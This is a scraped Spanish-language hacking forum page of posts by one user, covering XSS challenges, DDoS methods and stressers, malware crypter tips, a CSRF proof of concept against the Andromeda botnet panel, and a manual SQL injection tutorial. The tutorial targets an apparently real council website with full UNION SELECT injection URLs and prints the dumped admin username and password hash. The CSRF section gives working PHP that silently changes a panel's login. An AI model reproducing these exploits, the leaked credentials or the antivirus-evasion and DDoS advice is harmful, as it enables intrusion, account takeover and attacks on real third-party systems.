You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Yo pasé todos salvo el reto que utiliza UTF-7, es difícil que lo hayas pasado porque hace ya muchas versiones que Firefox dejó de soportar UTF-7 y para pasar ese reto los administradores decían que se abriese una consola javascript y que se ejecutase javascript:alert(document.domain)  por lo que o usaste un Firefox muy viejo o técnicamente NO pasaste todos los niveles.

Y por que usas firefox, el reto no te exige que uses firefox, hay muchos navegadores , hasta tu puedes hacer un navegador(?

Lo digo por tu captura de pantalla, por  bueno que el reto era bastante fácil, no había mucho que bypassear, prueba de ello es este solucionario You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ese puto podria ver usado una virtual para pasar el 9 xD

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Yo pasé todos salvo el reto que utiliza UTF-7, es difícil que lo hayas pasado porque hace ya muchas versiones que Firefox dejó de soportar UTF-7 y para pasar ese reto los administradores decían que se abriese una consola javascript y que se ejecutase javascript:alert(document.domain)  por lo que o usaste un Firefox muy viejo o técnicamente NO pasaste todos los niveles.

Y por que usas firefox, el reto no te exige que uses firefox, hay muchos navegadores , hasta tu puedes hacer un navegador(?
Revisa mis papers de xss de hace 2 años, quizas aprendes algo, no creas que lo sabes todo

Obvio que todos (excepto arthusu, que llego al 9) dicen que es muy facil, no me jodas si el lvl 1
es un simple <script>alert(document.domain)</script> xD

Para que os aparezca que avanzeis de nivel si o si, teneis que usar el alert y el document.domain si nos no os aparecera.

Ya lo acabe, hay 19 niveles.. aunque no se que hay que hacer para aparecer en el ranking xD.
Aunque para algunos no se xss, yo me diverti  uno de los retos que más me divertido sobre todo apartir del lvl 11 

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
El mejor ataque de denegación de servicio consiste en hacer explotar un kilo de C4 pegado al servidor que deseas tirar, a mí me enseñó ETA a hacerlo, además los súper-mega-ultra-hiper-hackers de Anonymous también lo hacen.

Un poco de trembolona y stanozol, y lo empujas y ya Jajajajajaa

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas me preguntaba cual es el método más efectivo para realizar un ataque DDos a parte de una botnet claro está jeje

Bien, mi moral etica me impulso a decirte eso, no confundas metodos con formas de realizarla.

Formas de Realizarla:
Desde tu ordenador, con programas que enviando peticionés a la página web (ya sean en batch,python,java, vb6) he visto en muchos lenguajes.
Desde una propia botnet con zombies conectados a ella.
Desde un propio servidor dedicado.
Desde una propia web que es tuya o la hiciste tuya
Desde una Streeser.
Desde un Rat que actue con caracteristicas de bootnet.(Como Darkcomet.)

Metodos.
Metodos hay muchisimos y más en las Streeser que estan de moda ahora.
-SSYN
-UDP
-UDP-LAG
-HTTP

pero los principales son esos, los demás que sacan son derivados o con nombres para llamar la atención, pero para mi los más potentes son SSYN y UDP.

Querias saber eso(?

Hola y en la sección  priv8 de porno no necesitas? Jajajajaja.
Broma.

Apuntense !

Puedes hacer tu crypter en vb6 con eof.
O simplemente bajarte un crypter libre, y si no tiene EOF añadirselo(ver si esta en autoit es easy, desde hex se ve a simple vista, si nos nada mas hay que ver su icono azul, ya sea en el cliente o stub(aunque aveces lo cambian hay).
Te lo bajas, si tiene eof te ira , si no tiene se lo añades manualmente.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Que es bien sencillo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Voy a dejar fijo este post por que me parece que le servirá a muchisima gente.

#Roedor, espero que lo puedas completar un poco mas con más codigos para mas moviles, el post quedará fijo para que no se pierda. FELICITACIONES POR EL POST!

Matabarras, que jodido eso que te muestra, en mi movil no lo he podido ver.. Pero si pude testearle todas las funciones.

Saludos!
ANTRAX

Si esto esta bien, si funcionaran en el bloqueo en la parte que dice llamada de emergencia seria la ostia, porque así si te encuentras un movil lo vuelves a estado de fabrica y ya.

PD: Ponele el link que puso y demas en el 1 mensaje del tema, así se ve todo más claro.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
que lastima que no Te funciono el de monitor de servicio,hubiera sido toda una experiencia a nivel Mitnick, jajaja..

Aca dejo la pag de donde saque los ultimos codigos, y donde hay mas

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En mi LG 3D si va .

que hijo de puta eso loco, me da mi correo de gmail y mil movidas, si tengo la sesion abierta etc..
Luego no se porque hay una parte que pone Heartbeat mas movidas.. xD

Y bajo del todo me da la opcion de " Send heartbeat to server"

Revisa windows update, las ultimas modificaciones que hizo, puedes quitarlas, si no te va, descarta que sea por las actualizacionés.

Si no te pasaba antes, es raro, si no es eso, puede ser que el modem este dañado, como dice antrax prueba con el de un amigo.

Hola, ahora que consegui una red en la que he podido abrir puertos te comento, una falla no se a que es debida.

Todo esta correcto, hasta que el programa decide escuchar el puerto hay falla.(Tengo el firewall desactivado) (Probado con un rat, y me conectan remotos.)

He probado a cerrar el rat, aver si asi el programa podia escuchar el puerto y tampoco.

Un saludo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Siguen apareciendo post mios aca, me encanta chicos. Amo este foro, me encanta aportar cosas que le sirvan a todos.

Quedate tranquilo Ignacio, que donde veamos buena información de seguro aparece acá.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Un poco feo trabajar para Nod32 

Tu crees? Agradescamos que sea la empresa que hace mas sociables con los usuarios, no?

Saludos!

Ninguna empresa de antivirus es buena.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Siguen apareciendo post mios aca, me encanta chicos. Amo este foro, me encanta aportar cosas que le sirvan a todos.

Un poco feo trabajar para Nod32 

Para la gente que no tiene scan, y necesita analizar muchas veces, aunque si esta bien que de vez en cuando no lo hagamos, ya que os da un scan gratuito por 1 solo click 

PD: No es nada nuevo, ya muchos lo sabreis.

Nos instalamos el componente Grease Monkey You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una vez lo tenemos instalado, le añadimos el siguiente script.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Entramos a la web, le damos a Enabled & Install y listo.(Sirve para más webs tipo adfly.)

Y hay más tipos de scripts 

Aqui dejo esta app para windows en delphi. De parte del grande seoane, y la gui de parte de Angel.




Código Fuente.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fuente:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Creditos Seoane, y Angel.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Excelente Tutorial, me resulto sumamente util. Tengo una duda, sigue siendo compatible VB6 en Windows 7 o Windows 8?

Obvio.

El post es de 2012, colega.

Autor del Post: IrareHS
Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Deja ya de copiar temas del foro, estas llenandolo haciendo copy & paste, y sin poner creditós, que falta de verguenza.

Bueno despues de analizar la botnet Andromeda, despues de que la liberaran, (Podeis encontrarla aqui: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) despues de encuentrar varias vulnerabilidades, pero que es normal que esten, como xss y demás..

Ya que se supone que solo va a utilizar el panel el administrador, y para que va a quererse hacer daño así mismo?.

Pero hasta que encontre, el directorio donde cambiamos nuestra contraseña etc etc..

Y no chequea el toquen ni el reffer, así que supose que seria vulnerable y empeze a crear el poc.

Más alla de todo, lo dificil es encontrar la web y el directorio, aunque si nos infectamos y conocemos a la persona.., pues se la podemos colar no?.

Bien, para no hacer tan descarado como siempre que público un csrf, utilizo el JS siguiente para camuflar.

// This code was coded by FrenetikK & Mor3nako.


function writeIf(url) {
	document.write('');
}

writeIf('http://127.0.0.1/csrf.php');

Simplemente, si tenemos nuestro csrf subido a nuestra web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login , y se llama csrf.php pues cambiamos el 127.0.0.1 por el de nuestra web sencillo no? xD.

Y en el index.html simplemente colocamos una redireccion hacia el JS. Supongamos que nuestro archivo se llama a.js.

<script src="a.js"></script>

Pues aqui el csrf,

<?php

//POC Change Password Andromeda Botnet
//codded: @Matabarras
$url = "web";
$form['newlogin'] = "admin";
$form['newpass1'] = "admin";
$form['newpass2']= "admin";

echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/nombredeldirectorio/?act=service&subact=logindata" method="POST">';

foreach($form As $key=>$value) {
	echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>

Una vez entren a la web que no se daran cuenta de nada gracias al JS.

Se le cambiara el usuario y contraseña y para acceder a la web simplemente pondremos en usuario Admin y en contraseña lo dejamos vacio.

Un saludo

Respecto a Faquir , sin comentarios cada cual sabra.

No le veo la gracia a usar una herramienta que te lo automatiza todo, se ve que es la moda.

Tampoco veo mal usarla en casos, donde el objetivo es sacar mucha información en poco tiempo.

Aunque ultimamente la gente ataca por que si, sin objetivo ni motivo alguno, pero bueno.

Espero que les haya gustado la explicación y se me equivocado en algo que me lo digan, no e entrado a especificar , porque queria hacerla sencilla y que se entendiera bien.

Texto escrito en el video:

Bueno soy Morenako-Matabarras y les voy a explicar como se realiza un ataque de Sql injecion manualmente.

En primer lugar vamos a la web a la que vamos a realizar la injección.

http://mostalocalcouncil.com/readnews.php?id=

En mi caso está.

Existe varios comentarios, /* -- #

ya que puede ser que con un comentario funcione y otro no.

y varias formas de realizarla, yo les explicare de una forma sencilla


Miraremos aver si es vulnerable facilmente con la tipica comilla simple.

Vemos que nos da el error así que empezemos.


Empezaremos con un - y una id de noticia el 1

y uniremos ya con +union+select+ o simplemente union select o /**/union/**/select/**/0

Hay diversas formas, con diversos comentarios, bueno.

Ahora lo que tenemos que hacer es añadir números hasta que nos desaparezca el error

Vale a partir de 4 nos ha desaparecido el error.

Entonces, ahora es cuando vamos a buscar las tablas de las basesdedatos.

Lo que haremos sera sustutir por uno de esos números por group_concat(table_name)

Una vez echo eso añadimos al final

+from+information_schema.tables -- - , ya que esto no es a ciegas

utilizamos el comentario -- o -- - al final de la consulta.


Vale aqui nos muestra todas las tablas, para mi la más importante y primera a mirar sera users, una cosa he de decirles

Quizas al sustituir el group_concat(table_name) por otro numero, no aparece nada por ejemplo

Por el 0 no nos aparece nada, si cambiamos el 1 por group_concat(table_name) si y si cambiamos el 2 también, es ir probando.

Bueno ya tenemos la tabla users que queremos mirar, así que vamos a transformar


http://mostalocalcouncil.com/readnews.php
?id=-1+union+select+0,1,group_concat(table_name),3,4+from+information_schema.tables -- -117,115,101,114,115 

ahora esto lo ponemos por ,.

Vale, la injeccion de momento la tenemos así 

http://mostalocalcouncil.com/readnews.php
?id=-1+union+select+0,1,group_concat(table_name),3,4+from+information_schema.tables -- -

Ahora lo que haremos es cambiar en group_concat(table_name) por group_concat(column_name)

y information_schema.tables por information_schema.columns y añadiremos


http://mostalocalcouncil.com/readnews.php?id=-1+union+select+0,1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=char(117,115,101,114,115) -- -

Y aparte de  cambiar eso, hemos añadido +where+table_name=char(aqui el codigo en ascii value que nos dio separado por comillas) -- -

Nos da varias columnas

yo mirare la de username y password
Asi que modificamos la consulta. y en group_concat(colum_name)

Column_name lo cambiamos por las columnas que queremos mirar separandolas por una coma y quitamos todo apartir de information_schema poniendo simplemente el nombre de la tabla, que miramos anteriormente que era USERS

http://mostalocalcouncil.com/readnews.php?id=-1+union+select+0,1,group_concat(username,password),3,4+from+users -- -

admin 68b752263e82b3b1ee1ffe739ee0eec1

Y ya tenemos el usuario y hash de la contraseña 

Si queremos miramos el email tambien, y la id

vemos que su id es 2

Bueno,espero que les aña servido el tutorial y lo hayan entendido

Un cordial saludo

Morenako,Matabarras